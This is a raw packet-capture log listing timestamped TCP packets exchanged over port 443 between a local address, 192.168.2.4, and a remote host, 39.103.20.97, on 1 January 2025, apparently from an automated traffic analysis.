Jan 1, 2025 08:30:43.097632885 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097770929 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097800970 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097820044 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097825050 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097843885 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097845078 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097904921 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.097909927 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.097974062 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.098012924 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.098022938 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.098026991 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.098041058 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.098053932 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.098064899 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.098068953 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.098097086 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.098098993 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.098124981 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.098129034 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.098150015 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.098181009 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188183069 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188244104 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188246012 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188252926 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188285112 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188287973 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188306093 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188311100 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188323021 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188337088 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188363075 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188364029 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188370943 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188404083 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188420057 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188425064 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188433886 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188445091 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188463926 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188467979 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188482046 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188488960 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188517094 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188523054 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188582897 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188620090 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188631058 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188636065 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188662052 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188683033 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188688993 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188693047 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188724041 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188765049 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.188952923 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188987017 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.188999891 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189002991 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189019918 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189029932 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189042091 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189044952 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189054012 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189070940 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189100981 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189105988 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189209938 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189238071 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189251900 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189258099 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189282894 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189296007 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189344883 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189385891 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189390898 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189394951 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189426899 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189436913 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189455032 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189496040 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189523935 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189567089 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189589024 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189620018 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189634085 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189637899 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189659119 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189678907 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.189733028 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.189785957 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326366901 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326406956 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326440096 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326462984 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326472998 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326482058 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326519966 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326553106 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326586008 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326620102 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326649904 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326651096 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326651096 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326651096 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326651096 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326667070 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326680899 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326714993 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326766014 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326771975 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326780081 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326822996 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326831102 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326849937 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326885939 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326895952 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326900005 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.326929092 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.326946974 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327052116 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327085018 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327097893 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327101946 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327121973 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327128887 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327143908 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327147007 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327177048 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327208996 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327322960 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327353954 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327370882 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327374935 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327402115 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327413082 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327415943 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327423096 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327445030 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327457905 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327487946 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327492952 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327557087 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327600956 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327606916 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327635050 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327677965 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327682972 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327697039 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327744007 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327749968 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327833891 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327866077 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327874899 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327878952 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327910900 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327927113 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327963114 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.327975035 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.327979088 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328002930 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328022003 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328164101 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328192949 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328208923 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328214884 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328242064 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328259945 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328299999 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328331947 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328350067 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328355074 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328380108 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328396082 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328402996 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328444004 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328444958 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328453064 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328480959 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328495979 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328661919 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328690052 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328707933 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328712940 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.328738928 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.328753948 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419187069 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419224977 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419241905 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419250965 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419267893 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419284105 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419292927 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419296026 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419306040 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419320107 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419337988 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419353008 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419358015 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419368029 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419378996 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419394016 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419400930 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419409990 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419419050 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419447899 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419450045 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419459105 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419491053 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419496059 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419501066 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419526100 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419533968 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419538021 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419559002 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419559956 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419575930 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419584036 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419594049 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419600010 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419625044 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419635057 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419639111 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419657946 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419662952 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419681072 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419683933 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419692039 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419708014 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419737101 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419742107 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419779062 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419811010 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419825077 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419828892 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419857025 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419867992 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419917107 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419960022 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.419970036 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.419974089 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420011997 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420020103 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420645952 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420702934 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420715094 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420746088 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420756102 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420759916 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420785904 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420787096 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420821905 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420824051 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420835972 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420849085 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420865059 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420880079 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420883894 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420905113 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420909882 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420938015 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420949936 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420954943 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420973063 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.420979977 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420993090 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.420995951 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.421006918 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.421021938 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.421036959 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.421053886 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.421057940 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.421088934 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.421097040 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.475205898 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.554651976 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554693937 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554743052 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.554749966 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554761887 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554780960 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.554799080 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554802895 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.554809093 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554840088 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554861069 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.554866076 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554876089 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.554876089 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554927111 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.554932117 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.554954052 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555011988 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555016041 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555038929 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555107117 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555113077 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555155039 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555186033 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555216074 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555221081 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555236101 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555253029 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555267096 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555272102 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555298090 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555325031 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555330992 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555335045 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555404902 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555432081 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555466890 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555479050 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555481911 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555535078 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555603027 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555630922 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555670977 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555675030 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555685043 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555711031 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555732965 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555737972 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555756092 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555778027 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555783033 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555787086 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555807114 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555819988 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555824995 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555847883 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555861950 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555903912 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.555954933 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.555988073 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556021929 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556025982 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556030035 CET	443	49740	39.103.20.97	192.168.2.4
